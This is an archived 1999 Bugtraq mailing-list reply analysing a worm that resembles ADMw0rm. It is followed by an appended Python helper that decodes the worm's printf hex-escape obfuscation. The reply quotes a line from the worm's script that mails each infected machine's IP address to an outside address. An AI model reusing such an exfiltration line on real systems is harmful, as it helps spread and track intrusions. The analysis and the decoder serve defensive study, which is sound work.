[11796] in bugtraq


Re: MW

daemon@ATHENA.MIT.EDU (Adam Morrison)
Thu Sep 9 21:06:28 1999

Message-Id:  <E11ON5h-0006DQ-00@devnull.xpert.com>
Date:         Tue, 7 Sep 1999 17:23:25 +0200
Reply-To: Adam Morrison <adam@XPERT.COM>
From: Adam Morrison <adam@XPERT.COM>
X-To:         scorpios@cs.huji.ac.il
To: BUGTRAQ@SECURITYFOCUS.COM

> On Wed, 1 Sep 1999, Christian Koderer wrote:
> > ./IP | mail `printf
> > "\x62\x65\x75\x72\x70\x40\x68\x6f\x74\x6d\x61\x69\x6c\x2e\x63\x6f\x6d"`
> > logout
> > _EOF_
>
>
> In case no one bothered figuring this one out, this translates to
> 'beurp@hotmail.com'
>
> Apparently './IP' is a program it runs to figure out which IP it should
> get the worm files from. Did you find a similarly named file?

It's a worm; it gets the worm files from the last infected machine.
`IP' returns the address of the machine that the copy of the worm
is running on, and is used in the `cmd' grappling hook which
apparently gets executed on compromised remote hosts.  Each time the
worm infects a machine, it mails the IP address of that machine to
<beurp@hotmail.com>.

Now, not to make any unfounded allegations, but this worm looks
remarkably like ADMw0rm.  I wonder why it restarts named when first
infecting a host, when it appears to also utilize several other
vulnerabilities in order to get in.  Ho, hum.
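As an added example (not code from the original post or from the worm), a small Python triage helper that decodes the `printf` hex-escape obfuscation discussed above and pulls out the address it hides; the sample script fragment is reconstructed from the quoted lines, and the octal handling goes slightly beyond the `\xNN` form the worm used.

```python
import re

# Constructed sample: the dropper fragment as quoted on the list, with the
# line break between `printf` and its argument preserved from the post.
SAMPLE_SCRIPT = r'''
./IP | mail `printf
"\x62\x65\x75\x72\x70\x40\x68\x6f\x74\x6d\x61\x69\x6c\x2e\x63\x6f\x6d"`
logout
'''

# Escape forms printf(1) understands: \xHH (hex) and \NNN (octal).
_ESCAPE_RE = re.compile(r'\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})')
# A double-quoted printf argument, allowing backslash-escaped characters inside.
_PRINTF_ARG_RE = re.compile(r'printf\s+"((?:[^"\\]|\\.)*)"')
_EMAIL_RE = re.compile(r'[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}')


def decode_printf_escapes(s: str) -> str:
    """Decode \\xHH and octal \\NNN escapes the way printf(1) would."""
    def repl(m: re.Match) -> str:
        if m.group(1) is not None:
            return chr(int(m.group(1), 16))
        return chr(int(m.group(2), 8))
    return _ESCAPE_RE.sub(repl, s)


def find_obfuscated_strings(script: str) -> list[str]:
    """Decoded contents of every `printf "..."` argument found in a script."""
    return [decode_printf_escapes(m.group(1))
            for m in _PRINTF_ARG_RE.finditer(script)]


def extract_contacts(script: str) -> list[str]:
    """E-mail addresses hidden inside escaped printf arguments."""
    found: list[str] = []
    for decoded in find_obfuscated_strings(script):
        found.extend(_EMAIL_RE.findall(decoded))
    return found


if __name__ == "__main__":
    for addr in extract_contacts(SAMPLE_SCRIPT):
        print("reporting address hidden in dropper:", addr)
```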
